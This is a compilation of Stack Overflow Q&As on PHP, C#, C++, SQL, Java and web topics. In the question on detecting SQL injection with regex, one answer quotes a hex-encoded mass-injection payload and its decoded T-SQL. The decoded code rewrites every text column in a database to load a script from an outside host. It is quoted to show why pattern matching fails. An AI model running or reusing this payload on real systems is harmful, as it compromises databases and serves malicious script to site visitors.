I think the answer might depend on the type of web applications you are running. I had to make this decision myself two years ago and couldn't decide between Zend Optimizer and eAccelerator. In order to make my decision, I used ab (apache bench) to test the server, and tested the three combinations (zend, eaccelerator, both running) and proved that eAccelerator on its own gave the greatest performance. If you have the luxury of time, I would recommend doing similar tests yourself, and making the decision based on your results.
I have run several [benchmarks with eAcclerator, APC, XCache](http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/), and Zend Optimizer (even though Zend is an optimizer, not a cache). [Benchmark Results http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode\_wordpress.png](http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png) Result: eAccelerator is fastest (in all tests), followed by XCache and APC. (The one in the diagram is the number of seconds to call a WordPress home page 10,000 times). Zend Optimizer made everything slower (!).
Which PHP opcode cacher should I use to improve performance?
[ "", "php", "performance", "caching", "" ]
I am working on a project right now that involves receiving a message from another application, formatting the contents of that message, and sending it to a printer. The technology of choice is C# windows service. The output could be called a report, I suppose, but a reporting engine is not necessary. A simple templating engine, like StringTemplate, or even XSLT outputting HTML would be fine. The problem I'm having is finding a free way to print this kind of output from a service. Since it *seems* that it will work, I'm working on a prototype using Microsoft's RDLC, populating a local report and then rendering it as an image to a memory stream, which I will then print. Issues with that are: * Multi-page printing will be a big headache. * Still have to use PrintDocument to print the memory stream, which is unsupported in a Windows Service (though it may work - haven't gotten that far with the prototype yet) * If the data coming across changes, I have to change the dataset and the class that the data is being deserialized into. bad bad bad. Has anyone had to do anything remotely like this? Any advice? I already posted a question about printing HTML without user input, and after wasting about 3 days on that, I have come to the conclusion that it cannot be done, at least not with any freely available tool. All help is appreciated. EDIT: We are on version 2.0 of the .NET framework.
Trust me, you will spend more money trying to search/develop a solution for this as compared to buying a third party component. Do not reinvent the wheel and go for the paid solution. Printing is a complex problem and I would love to see the day when better framework support is added for this.
Printing from a Windows service is really painful. It seems to work... sometimes... but finally it craches or throws an exception from time to time, without any clear reason. It's really hopeless. Officially, it's even [not supported](http://msdn.microsoft.com/en-us/library/system.drawing.printing(VS.80).aspx), without any explanation, nor any proposal for an alternate solution. Recently, I have been confronted to the problem and after several unsuccessful trials and experimentations, I came finally with two viable solutions: * Write your own printing DLL using the Win32 API (in C/C++ for instance), then use it from your service with P/Invoke (works fine) * Write your own printing COM+ component, then uses it from your service. I have chosen this solution with success recently (but it was third party COM+ component, not own written) It works absolutely fine too.
Printing from a .NET Service
[ "", "c#", ".net", "windows-services", "printing", "" ]
I'm using the .NETCF (Windows Mobile) `Graphics` class and the `DrawString()` method to render a single character to the screen. The problem is that I can't seem to get it centred properly. No matter what I set for the Y coordinate of the location of the string render, it always comes out lower than that and the larger the text size the greater the Y offset. For example, at text size 12, the offset is about 4, but at 32 the offset is about 10. I want the character to vertically take up most of the rectangle it's being drawn in and be centred horizontally. Here's my basic code. `this` is referencing the user control it's being drawn in. ``` Graphics g = this.CreateGraphics(); float padx = ((float)this.Size.Width) * (0.05F); float pady = ((float)this.Size.Height) * (0.05F); float width = ((float)this.Size.Width) - 2 * padx; float height = ((float)this.Size.Height) - 2 * pady; float emSize = height; g.DrawString(letter, new Font(FontFamily.GenericSansSerif, emSize, FontStyle.Regular), new SolidBrush(Color.Black), padx, pady); ``` Yes, I know there is the label control that I could use instead and set the centring with that, but I actually do need to do this manually with the `Graphics` class.
Through a combination of the suggestions I got, I came up with this: ``` private void DrawLetter() { Graphics g = this.CreateGraphics(); float width = ((float)this.ClientRectangle.Width); float height = ((float)this.ClientRectangle.Width); float emSize = height; Font font = new Font(FontFamily.GenericSansSerif, emSize, FontStyle.Regular); font = FindBestFitFont(g, letter.ToString(), font, this.ClientRectangle.Size); SizeF size = g.MeasureString(letter.ToString(), font); g.DrawString(letter, font, new SolidBrush(Color.Black), (width-size.Width)/2, 0); } private Font FindBestFitFont(Graphics g, String text, Font font, Size proposedSize) { // Compute actual size, shrink if needed while (true) { SizeF size = g.MeasureString(text, font); // It fits, back out if (size.Height <= proposedSize.Height && size.Width <= proposedSize.Width) { return font; } // Try a smaller font (90% of old size) Font oldFont = font; font = new Font(font.Name, (float)(font.Size * .9), font.Style); oldFont.Dispose(); } } ``` So far, this works flawlessly. The only thing I would change is to move the FindBestFitFont() call to the OnResize() event so that I'm not calling it every time I draw a letter. It only needs to be called when the control size changes. I just included it in the function for completeness.
I'd like to add another vote for the StringFormat object. You can use this simply to specify "center, center" and the text will be drawn centrally in the rectangle or points provided: ``` StringFormat format = new StringFormat(); format.LineAlignment = StringAlignment.Center; format.Alignment = StringAlignment.Center; ``` However there is one issue with this in CF. If you use Center for both values then it turns TextWrapping off. No idea why this happens, it appears to be a bug with the CF.
Center text output from Graphics.DrawString()
[ "", "c#", "graphics", "compact-framework", "" ]
I joined a new company about a month ago. The company is rather small in size and has pretty strong "start-up" feel to it. I'm working as a Java developer on a team of 3 others. The company primarily sells a service to for businesses/business-type people to use in communicating with each other. One of the main things I have been, and will be working on, is the main website for the company - from which the service is sold, existing users login to check their service and pay their bills, new users can sign up for a trial, etc. Currently this is a JSP application deployed on Tomcat, with access to a database done thru a persistence layer written by the company itself. A repeated and growing frustration I am having here (and I'm pretty happy with the job overall, so this isn't an "oh no I don't like my job"-type post) is the lack of any larger design or architecture for this web application. The app is made up of several dozen JSP pages, with almost no logic existing in Servlets or Beans or any other sort of framework. Many of the JSP pages are thousands of lines of code, they `jsp:include` other JSP pages, business logic is mixed in with the HTML, frequently used snippets of code (such as obtaining a web service connection) is cut and paste rather than reused, etc. In other words, the application is a mess. There have been some rumblings within the company of trying to re-architect this site so that it fits MVC better; I think that the developers and higher-ups are beginning to realize that this current pattern of spaghetti code isn't sustainable or very easily scalable to add more features for the users. The higher-ups and developers are wary of completely re-writing the thing (with good reason, since this would mean several weeks or months of work re-writing existing functionality), but we've had some discussions of (slowly) re-writing certain areas of the site into a new framework. What are some of the best strategies to enable moving the application and codebase into this direction? How can I as a developer really help move this along, and quickly, without seeming like the jerk-y new guy who comes into a job and tells everyone that what they've written is crap? Are there any proven strategies or experiences that you've used in your own job experience when you've encountered this sort of thing?
Your best bet is probably to refactor it slowly as you go along. Few us of have the resources that would be required to completely start from scratch with something that has so many business rules buried in it. Management really hates it when you spend months on developing an app that has more bugs than the one you replaced. If you have the opportunity to build any separate apps from scratch, use all of the best practices there and use it to demonstrate how effective they are. When you can, incorporate those ideas gradually into the old application.
First pick up a copy of Michael Feather's Working [Effectively with Legacy Code](https://rads.stackoverflow.com/amzn/click/com/0131177052). Then identify how best to test the existing code. The worst case is that you are stuck with just some high level regression tests (or nothing at all) and If you are lucky there will be unit tests. Then it is a case of slow steady refactoring hopefully while adding new business functionality at the same time.
What is the best way to migrate an existing messy webapp to elegant MVC?
[ "", "java", "model-view-controller", "jsp", "architecture", "" ]
Why does Visual Studio declare new classes as private in C#? I almost always switch them over to public, am I the crazy one?
Private access by default seems like a reasonable design choice on the part of the C# language specifiers. A good general design principle is to make all access levels as restrictive as possible, to minimize dependencies. You are less likely to end up with the wrong access level if you start as restrictive as possible and make the developer take some action to make a class or member more visible. If something is less public than you need, then that is apparent immediately when you get a compilation error, but it is not nearly as easy to spot something that is more visible than it should be.
I am not sure WHY it does that, but here's what you do in order to get Visual Studio to create the class as Public by default: Go over to “Program Files\Microsoft Visual Studio 9.0\Common7\IDE\ItemTemplates\CSharp\Code\1033″, you will find a file called Class.zip, inside the .zip file open the file called Class.cs, the content of the file looks like this: ``` using System; using System.Collections.Generic; $if$ ($targetframeworkversion$ == 3.5)using System.Linq; $endif$using System.Text; namespace $rootnamespace$ { class $safeitemrootname$ { } } ``` All you need to do is add “Public” before the class name. The outcome should look like this: ``` using System; using System.Collections.Generic; $if$ ($targetframeworkversion$ == 3.5)using System.Linq; $endif$using System.Text; namespace $rootnamespace$ { public class $safeitemrootname$ { } } ``` One last thing you need to do is flush all the Templates Visual Studio is using, and make him reload them. The command for that is ( it takes a while so hold on): ``` devenv /installvstemplates ``` And that’s it, no more private classes by default. Of course you can also add internal or whatever you want. [Source](http://www.dev102.com/2008/03/14/how-to-get-visual-studio-to-create-new-classes-public-by-default/)
VS.NET defaults to private class
[ "", "c#", "visual-studio", "" ]
I was looking at the API documentation for stl vector, and noticed there was no method on the vector class that allowed the removal of an element with a certain value. This seems like a common operation, and it seems odd that there's no built in way to do this.
`std::remove` does not actually erase elements from the container: it overwrites the elements that should not be removed at the beginning of the container, and returns the iterator pointing to the next element after them. This iterator can be passed to `container_type::erase` to do the actual removal of the extra elements that are now at the end of the container: ``` std::vector<int> vec; // .. put in some values .. int int_to_remove = n; vec.erase(std::remove(vec.begin(), vec.end(), int_to_remove), vec.end()); ```
If you want to remove ***an*** item, the following will be a bit more efficient. ``` std::vector<int> v; auto it = std::find(v.begin(), v.end(), 5); if(it != v.end()) v.erase(it); ``` or you may avoid overhead of moving the items if the order does not matter to you: ``` std::vector<int> v; auto it = std::find(v.begin(), v.end(), 5); if (it != v.end()) { using std::swap; // swap the one to be removed with the last element // and remove the item at the end of the container // to prevent moving all items after '5' by one swap(*it, v.back()); v.pop_back(); } ``` Which is what Jim's method of `std::vector::erase` + `std::remove` does under the hood.
How do I remove an item from a stl vector with a certain value?
[ "", "c++", "stl", "" ]
I want to get the MD5 Hash of a string value in SQL Server 2005. I do this with the following command: ``` SELECT HashBytes('MD5', 'HelloWorld') ``` However, this returns a VarBinary instead of a VarChar value. If I attempt to convert `0x68E109F0F40CA72A15E05CC22786F8E6` into a VarChar I get `há ðô§*à\Â'†øæ` instead of `68E109F0F40CA72A15E05CC22786F8E6`. Is there any SQL-based solution? **[Yes](https://stackoverflow.com/questions/2120/#2382)**
I have found the solution else where: ``` SELECT SUBSTRING(master.dbo.fn_varbintohexstr(HashBytes('MD5', 'HelloWorld')), 3, 32) ```
``` SELECT CONVERT(NVARCHAR(32),HashBytes('MD5', 'Hello World'),2) ```
Convert HashBytes to VarChar
[ "", "sql", "sql-server", "" ]
I am a web-developer working in PHP. I have some limited experience with using Test Driven Development in C# desktop applications. In that case we used nUnit for the unit testing framework. I would like to start using TDD in new projects but I'm really not sure where to begin. What recommendations do you have for a PHP-based unit testing framework and what are some good resources for someone who is pretty new to the TDD concept?
I've used both PHPUnit & **[SimpleTest](http://simpletest.org/)** and I found **SimpleTest** to be easier to use. As far as TDD goes, I haven't had much luck with it in the purest sense. I think that's mainly a time/discipline issue on my part though. Adding tests after the fact has been somewhat useful but my favorite things to do is use write SimpleTest tests that test for specific bugs that I have to fix. That makes it very easy to verify that things are actually fixed and stay fixed.
I highly recommend [Test-Driven Development by Kent Beck (ISBN-10: 0321146530)](https://rads.stackoverflow.com/amzn/click/com/0321146530). It wasn't written specifically for PHP, but the concepts are there and should be easily translatable to PHP.
Test Driven Development in PHP
[ "", "php", "unit-testing", "tdd", "" ]
Is there a Regular Expression that can detect SQL in a string? Does anyone have a sample of something that they have used before to share?
Don't do it. You're practically guaranteed to fail. Use `PreparedStatement` (or its equivalent) instead.
Use stored procedures or prepared statements. How will you detect something like this? BTW **do NOT run this:** ``` DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C40432056415243 4841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S); ``` Which translates to: ``` ( DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC( 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=chkbnr.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor ) ```
RegEx to Detect SQL Injection
[ "", "sql", "regex", "sql-injection", "" ]
I assume that you can't use a JavaScript code snippet to validate if the browser user has turned off JavaScript. So what can I use instead? Can someone offer a code sample? I'm looking to wrap an if/then statement around it. I often code in CFML, if that helps.
Are we talking about something like this: JavaScript: ``` <body> ... ... <script type="text/javascript"> <!-- document.write("Hello World!") //--> </script> <noscript>Your browser does not support JavaScript!</noscript> ... ... </body> ```
this is a total hack but you could use an iframe inside the noscript tag to trigger an HTTP GET on a url to tell the server that a user doesn't have javascript enabled. ``` <body> ... ... <noscript> <iframe src ="/nojs.aspx?SOMEIDENTIFIER=XXXX&NOJS=TRUE" style="display: none;"> </iframe> </noscript> ... ... </body> ```
How do I know if Javascript has been turned off inside browser?
[ "", "javascript", "browser", "" ]
The new extensions in .Net 3.5 allow functionality to be split out from interfaces. For instance in .Net 2.0 ``` public interface IHaveChildren { string ParentType { get; } int ParentId { get; } List<IChild> GetChildren() } ``` Can (in 3.5) become: ``` public interface IHaveChildren { string ParentType { get; } int ParentId { get; } } public static class HaveChildrenExtension { public static List<IChild> GetChildren( this IHaveChildren ) { //logic to get children by parent type and id //shared for all classes implementing IHaveChildren } } ``` This seems to me to be a better mechanism for many interfaces. They no longer need an abstract base to share this code, and functionally the code works the same. This could make the code more maintainable and easier to test. The only disadvantage being that an abstract bases implementation can be virtual, but can that be worked around (would an instance method hide an extension method with the same name? would it be confusing code to do so?) Any other reasons not to regularly use this pattern? --- Clarification: Yeah, I see the tendency with extension methods is to end up with them everywhere. I'd be particularly careful having any on .Net value types without a great deal of peer review (I think the only one we have on a string is a `.SplitToDictionary()` - similar to `.Split()` but taking a key-value delimiter too) I think there's a whole best practice debate there ;-) (Incidentally: DannySmurf, your PM sounds scary.) I'm specifically asking here about using extension methods where previously we had interface methods. --- I'm trying to avoid lots of levels of abstract base classes - the classes implementing these models mostly already have base classes. I think this model could be more maintainable and less overly-coupled than adding further object hierarchies. Is this what MS has done to IEnumerable and IQueryable for Linq?
I think the judicious use of extension methods put interfaces on a more equatable position with (abstract) base classes. **Versioning.** One advantage base classes have over interfaces is that you can easily add new virtual members in a later version, whereas adding members to an interface will break implementers built against the old version of the library. Instead, a new version of the interface with the new members needs to be created, and the library will have to work around or limit access to legacy objects only implementing the original interface. As a concrete example, the first version of a library might define an interface like so: ``` public interface INode { INode Root { get; } List<INode> GetChildren( ); } ``` Once the library has released, we cannot modify the interface without breaking current users. Instead, in the next release we would need to define a new interface to add additional functionalty: ``` public interface IChildNode : INode { INode Parent { get; } } ``` However, only users of the new library will be able to implement the new interface. In order to work with legacy code, we need to adapt the old implementation, which an extension method can handle nicely: ``` public static class NodeExtensions { public INode GetParent( this INode node ) { // If the node implements the new interface, call it directly. var childNode = node as IChildNode; if( !object.ReferenceEquals( childNode, null ) ) return childNode.Parent; // Otherwise, fall back on a default implementation. return FindParent( node, node.Root ); } } ``` Now all users of the new library can treat both legacy and modern implementations identically. **Overloads.** Another area where extension methods can be useful is in providing overloads for interface methods. You might have a method with several parameters to control its action, of which only the first one or two are important in the 90% case. Since C# does not allow setting default values for parameters, users either have to call the fully parameterized method every time, or every implementation must implement the trivial overloads for the core method. Instead extension methods can be used to provide the trivial overload implementations: ``` public interface ILongMethod { public bool LongMethod( string s, double d, int i, object o, ... ); } ... public static LongMethodExtensions { public bool LongMethod( this ILongMethod lm, string s, double d ) { lm.LongMethod( s, d, 0, null ); } ... } ``` Please note that both of these cases are written in terms of the operations provided by the interfaces, and involve trivial or well-known default implementations. That said, you can only inherit from a class once, and the targeted use of extension methods can provide a valuable way to deal with some of the niceties provided by base classes that interfaces lack :) --- **Edit:** A related post by Joe Duffy: [Extension methods as default interface method implementations](http://joeduffyblog.com/2010/02/09/extension-methods-as-default-interface-method-implementations/)
Extension methods should be used as just that: extensions. Any crucial structure/design related code or non-trivial operation should be put in an object that is composed into/inherited from a class or interface. Once another object tries to use the extended one, they won't see the extensions and might have to reimplement/re-reference them again. The traditional wisdom is that Extension methods should only be used for: * utility classes, as Vaibhav mentioned * extending sealed 3rd party APIs
Extension interface patterns
[ "", "c#", ".net-3.5", "extension-methods", "" ]
I can set the PHP include path in the `php.ini`: ``` include_path = /path/to/site/includes/ ``` But then other websites are affected so that is no good. I can set the PHP include in the start of every file: ``` $path = '/path/to/site/includes/'; set_include_path(get_include_path() . PATH_SEPARATOR . $path); ``` But that seems like bad practice and clutters things up. So I can make an include of that and then include it into every file: ``` include 'includes/config.php'; ``` or ``` include '../includes/config.php'; ``` This is what I'm doing right now, but the include path of `config.php` will change depending on what is including it. Is there a better way? Does it matter?
If you're using apache as a webserver you can override (if you allow it) settings using *.htaccess* files. See [the PHP manual](https://www.php.net/configuration.changes) for details. Basically you put a file called *.htaccess* in your website root, which contains some PHP `ini` values. Provided you configured Apache to allow overrides, this site will use all values in your PHP config, + the values you specify in the *.htaccess* file. > Can be used only with `PHP_INI_ALL` and `PHP_INI_PERDIR` type directives as stated in the page I linked. If you click through to the full listing, you see that the include path is a `PHP_INI_ALL` directive.
Erik Van Brakel gave, IMHO, one of the best answers. More, if you're using Apache & Virtual hosts, you can set up includes directly in them. Using this method, you won't have to remember to leave php\_admin commands in your .htaccess.
Setting PHP Include Path on a per site basis?
[ "", "php", "include", "" ]
I'm still new to the ASP.NET world, so I could be way off base here, but so far this is to the best of my (limited) knowledge! Let's say I have a standard business object "Contact" in the *Business* namespace. I write a Web Service to retrieve a Contact's info from a database and return it. I then write a client application to request said details. Now, I also then create a utility method that takes a "Contact" and does some magic with it, like `Utils.BuyContactNewHat()` say. Which of course takes the Contact of type `Business.Contact`. I then go back to my client application and want to utilise the `BuyContactNewHat` method, so I add a reference to my *Utils* namespace and there it is. However, a problem arises with: ``` Contact c = MyWebService.GetContact("Rob); Utils.BuyContactNewHat(c); // << Error Here ``` Since the return type of `GetContact` is of `MyWebService.Contact` and not `Business.Contact` as expected. I understand why this is because when accessing a web service, you are actually programming against the proxy class generated by the WSDL. So, is there an "easier" way to deal with this type of mismatch? I was considering perhaps trying to create a generic converter class that uses reflection to ensure two objects have the same structure than simply transferring the values across from one to the other.
You are on the right track. To get the data from the proxy object back into one of your own objects, you have to do left-hand-right-hand code. i.e. copy property values. I'll bet you that there is already a generic method out there that uses reflection. Some people will use something other than a web service (.net remoting) if they just want to get a business object across the wire. Or they'll use binary serialization. I'm guessing you are using the web service for a reason, so you'll have to do property copying.
You don't actually have to use the generated class that the WSDL gives you. If you take a look at the code that it generates, it's just making calls into some .NET framework classes to submit SOAP requests. In the past I have copied that code into a normal .cs file and edited it. Although I haven't tried this specifically, I see no reason why you couldn't drop the proxy class definition and use the original class to receive the results of the SOAP call. It must already be doing reflection under the hood, it seems a shame to do it twice.
ASP.NET Web Service Results, Proxy Classes and Type Conversion
[ "", "c#", "asp.net", "web-services", "" ]
I'm interested in learning some (ideally) database agnostic ways of selecting the *n*th row from a database table. It would also be interesting to see how this can be achieved using the native functionality of the following databases: * SQL Server * MySQL * PostgreSQL * SQLite * Oracle I am currently doing something like the following in SQL Server 2005, but I'd be interested in seeing other's more agnostic approaches: ``` WITH Ordered AS ( SELECT ROW_NUMBER() OVER (ORDER BY OrderID) AS RowNumber, OrderID, OrderDate FROM Orders) SELECT * FROM Ordered WHERE RowNumber = 1000000 ``` Credit for the above SQL: [Firoz Ansari's Weblog](https://web.archive.org/web/20101103031717/http://weblogs.asp.net/Firoz/archive/2005/06/12/411949.aspx) **Update:** See [Troels Arvin's answer](https://stackoverflow.com/questions/16568/how-to-select-the-nth-row-in-a-sql-database-table#42765) regarding the SQL standard. *Troels, have you got any links we can cite?*
There are ways of doing this in optional parts of the standard, but a lot of databases support their own way of doing it. A really good site that talks about this and other things is <http://troels.arvin.dk/db/rdbms/#select-limit>. Basically, PostgreSQL and MySQL supports the non-standard: ``` SELECT... LIMIT y OFFSET x ``` Oracle, DB2 and MSSQL supports the standard windowing functions: ``` SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY key ASC) AS rownumber, columns FROM tablename ) AS foo WHERE rownumber <= n ``` (which I just copied from the site linked above since I never use those DBs) *Update:* As of PostgreSQL 8.4 the standard windowing functions are supported, so expect the second example to work for PostgreSQL as well. *Update:* SQLite added window functions support in version 3.25.0 on 2018-09-15 so both forms also work in SQLite.
PostgreSQL supports [windowing functions](https://www.postgresql.org/docs/current/tutorial-window.html) as defined by the SQL standard, but they're awkward, so most people use (the non-standard) [`LIMIT` / `OFFSET`](http://www.postgresql.org/docs/current/static/queries-limit.html): ``` SELECT * FROM mytable ORDER BY somefield LIMIT 1 OFFSET 20; ``` This example selects the 21st row. `OFFSET 20` is telling Postgres to skip the first 20 records. If you don't specify an `ORDER BY` clause, there's no guarantee which record you will get back, which is rarely useful.
How to select the nth row in a SQL database table?
[ "", "mysql", "sql", "database", "oracle", "postgresql", "" ]
I am using a class library which represents some of its configuration in .xml. The configuration is read in using the `XmlSerializer`. Fortunately, the classes which represent the .xml use the `XmlAnyElement` attribute at which allows me to extend the configuration data for my own purposes without modifying the original class library. ``` <?xml version="1.0" encoding="utf-8"?> <Config> <data>This is some data</data> <MyConfig> <data>This is my data</data> </MyConfig> </Config> ``` This works well for deserialization. I am able to allow the class library to deserialize the .xml as normal and the I can use my own `XmlSerializer` instances with a `XmlNodeReader` against the internal `XmlNode`. ``` public class Config { [XmlElement] public string data; [XmlAnyElement] public XmlNode element; } public class MyConfig { [XmlElement] public string data; } class Program { static void Main(string[] args) { using (Stream fs = new FileStream(@"c:\temp\xmltest.xml", FileMode.Open)) { XmlSerializer xser1 = new XmlSerializer(typeof(Config)); Config config = (Config)xser1.Deserialize(fs); if (config.element != null) { XmlSerializer xser2 = new XmlSerializer(typeof(MyConfig)); MyConfig myConfig = (MyConfig)xser2.Deserialize(new XmlNodeReader(config.element)); } } } ``` I need to create a utility which will allow the user to generate a new configuration file that includes both the class library configuration as well my own configuration, so new objects will be created which were not read from the .xml file. The question is how can I serialize the data back into .xml? I realize that I have to initially call `XmlSerializer.Serialize` on my data before calling the same method on the class library configuration. However, this requires that my data is represented by an `XmlNode` after calling `Serialize`. What is the best way to serialize an object into an `XmlNode` using the `XmlSerializer`? Thanks, -kevin btw-- It looks like an `XmlNodeWriter` class written by Chris Lovett was available at one time from Microsoft, but the links are now broken. Does anyone know of an alternative location to get this class?
So you need to have your class contain custom configuration information, then serialize that class to XML, then make that serialized XML into an XML node: is that right? Could you just take the string created by the XMLSerializer and wrap that in it's own XML tags? ``` XmlSerializer xs = new XmlSerializer(typeof(MyConfig)); StringWriter xout = new StringWriter(); xs.Serialize(xout, myConfig); XmlDocument x = new XmlDocument(); x.LoadXml("<myConfig>" + xout.ToString() + "</myConfig>"); ``` Now x is an XmlDocument containing one element, "<myconfig>", which has your serialized custom configuration in it. Is that at all what you're looking for?
It took a bit of work, but the XPathNavigator route does work... just remember to call .Close on the XmlWriter, .Flush() doesn't do anything: ``` //DataContractSerializer serializer = new DataContractSerializer(typeof(foo)); XmlSerializer serializer = new XmlSerializer(typeof(foo)); XmlDocument doc = new XmlDocument(); XPathNavigator nav = doc.CreateNavigator(); XmlWriter writer = nav.AppendChild(); writer.WriteStartDocument(); //serializer.WriteObject(writer, new foo { bar = 42 }); serializer.Serialize(writer, new foo { bar = 42 }); writer.WriteEndDocument(); writer.Flush(); writer.Close(); Console.WriteLine(doc.OuterXml); ```
How do I create an XmlNode from a call to XmlSerializer.Serialize?
[ "", "c#", "xml", "" ]
What is a good way to remove the code from display pages when developing with PHP. Often the pages I work on need to be editted by an outside person. This person is often confused by lots of blocks of PHP, and also likes to break my code. I've tried moving blocks of code out into functions, so now there are functions spread out all throughout the HTML now. As some pages become more complex it becomes a program again, and processing POSTs are questionable. What can I be doing better in my PHP development?
You don't need a "system" to do templating. You can do it on your own by keeping presentation & logic separate. This way the designer can screw up the display, but not the logic behind it. Here's a simple example: ``` <?php $people = array('derek','joel','jeff'); $people[0] = 'martin'; // all your logic goes here include 'templates/people.php'; ?> ``` Now here's the people.php file (which you give your designer): ``` <html> <body> <?php foreach($people as $name):?> <b>Person:</b> <?=$name?> <br /> <?php endforeach;?> </body> </html> ```
Take a look at how some of the popular PHP frameworks use templating. Examples include cakePHP, Zend Framework, and Code Igniter. Even if you are not going to base your site on these frameworks, the template design pattern is a good way to keep php code away from your web designers, so they can focus on layout and not functionality.
PHP best practices?
[ "", "php", "" ]
Is there any way, in any language, to hook my program when a user renames a file? For example: A user renames a file and presses enter (or clicks away) to confirm the rename action. BEFORE the file is actually renamed, my program "listens" to this event and pops up a message saying "Are you sure you want to rename C:\test\file.txt to C:\test\test.txt?". I'm thinking/hoping this is possible with C++, C# or .NET.. But I don't have any clue where to look for.
You can probably solve this by using the [FileSystemWatcher class](http://msdn.microsoft.com/en-us/library/system.io.filesystemwatcher.aspx) in .NET framework. From the class remarks: > You can watch for renaming, deletion, > or creation of files or directories. > For example, to watch for renaming of > text files, set the Filter property to > "\*.txt" and call the WaitForChanged > method with a Renamed specified for > its parameter.
My guess is that this is *not* possible, I did find [this](http://msdn.microsoft.com/en-us/library/bb776794(VS.85).aspx) which is for monitoring operations (including rename) on a folder, but there does not appear to be a similar method for files. @Richard, FileSystemWatcher is good if you only need to monitor changes, but he needs to interrupt them which it cannot do.
Hooking my program with windows explorer's rename event
[ "", "c#", ".net", "file", "io", "" ]
My current preferred C++ environment is the free and largely excellent Microsoft Visual Studio 2005 Express edition. From time to time I have sent release .exe files to other people with pleasing results. However recently I made the disturbing discovery that the pleasing results were based on more luck that I would like. Attempting to run one of these programs on an old (2001 vintage, not scrupulously updated) XP box gave me nothing but a nasty "System cannot run x.exe" (or similar) message. Some googling revealed that with this toolset, even specifying static linking results in a simple hello-world.exe actually relying on extra .dll files (msvcm80.dll etc.). An incredibly elaborate version scheming system (manifest files anyone?) then will not let the .exe run without exactly the right .dll versions. I don't want or need this stuff, I just want an old fashioned self contained .exe that does nothing but lowest common denominator Win32 operations and runs on any old win32 OS. Does anyone know if its possible to do what I want to do with my existing toolset ? Thank you.
For the C-runtime go to the project settings, choose C/C++ then 'Code Generation'. Change the 'runtime library' setting to 'multithreaded' instead of 'multithreaded dll'. If you are using any other libraries you may need to tell the linker to ignore the dynamically linked CRT explicitly.
My experience in Visual Studio 2010 is that there are two changes needed so as to not need DLL's. From the project property page (right click on the project name in the Solution Explorer window): 1. Under Configuration Properties --> General, change the "Use of MFC" field to "Use MFC in a Static Library". 2. Under Configuration Properties --> C/C++ --> Code Generation, change the "Runtime Library" field to "Multi-Threaded (/MT)" Not sure why both were needed. I used this to remove a dependency on glut32.dll. Added later: When making these changes to the configurations, you should make them to "All Configurations" --- you can select this at the top of the Properties window. If you make the change to just the Debug configuration, it won't apply to the Release configuration, and vice-versa.
How do I make a fully statically linked .exe with Visual Studio Express 2005?
[ "", "c++", "visual-studio", "linker", "" ]
Instead of writing my ASP.NET C# applications in Visual Studio, I used my favorite text editor UltraEdit32. Is there any way I can implement MVC without the use of VS?
There is nothing VS specific with the MVC framework - it is just a bunch of DLLs that you can use. The wizards in VS just build you a quick-start framework. ASP.NET MVC is "bin-deployable" - there is nothing too clever to set up on the server either - just point the wildcard ISAPI filter to ASP.NET
Assuming you have the correct assemblies and a C# compiler you in theory can use whatever you want to edit the code and then just run the compiler by hand or using a build script. That being said it is a real pain doing .NET development without Visual Studio/SharpEdit/Monodevelop in my opinion.
Developing for ASP.NET-MVC without Visual Studio
[ "", "c#", "asp.net-mvc", "visual-studio", "" ]
Is there a way to create a `JButton` with your own button graphic and not just with an image inside the button? If not, is there another way to create a custom `JButton` in java?
When I was first learning Java we had to make Yahtzee and I thought it would be cool to create custom Swing components and containers instead of just drawing everything on one `JPanel`. The benefit of extending `Swing` components, of course, is to have the ability to add support for keyboard shortcuts and other accessibility features that you can't do just by having a `paint()` method print a pretty picture. It may not be done the best way however, but it may be a good starting point for you. Edit 8/6 - If it wasn't apparent from the images, each Die is a button you can click. This will move it to the `DiceContainer` below. Looking at the source code you can see that each Die button is drawn dynamically, based on its value. ![alt text](https://i.stack.imgur.com/pgyQp.jpg) ![alt text](https://i.stack.imgur.com/jkYRd.jpg) ![alt text](https://i.stack.imgur.com/9BI34.jpg) Here are the basic steps: 1. Create a class that extends `JComponent` 2. Call parent constructor `super()` in your constructors 3. Make sure you class implements `MouseListener` 4. Put this in the constructor: ``` enableInputMethods(true); addMouseListener(this); ``` 5. Override these methods: ``` public Dimension getPreferredSize() public Dimension getMinimumSize() public Dimension getMaximumSize() ``` 6. Override this method: ``` public void paintComponent(Graphics g) ``` The amount of space you have to work with when drawing your button is defined by `getPreferredSize()`, assuming `getMinimumSize()` and `getMaximumSize()` return the same value. I haven't experimented too much with this but, depending on the layout you use for your GUI your button could look completely different. And finally, the [source code](https://github.com/kdeloach/labs/blob/master/java/yahtzee/src/Dice.java). In case I missed anything.
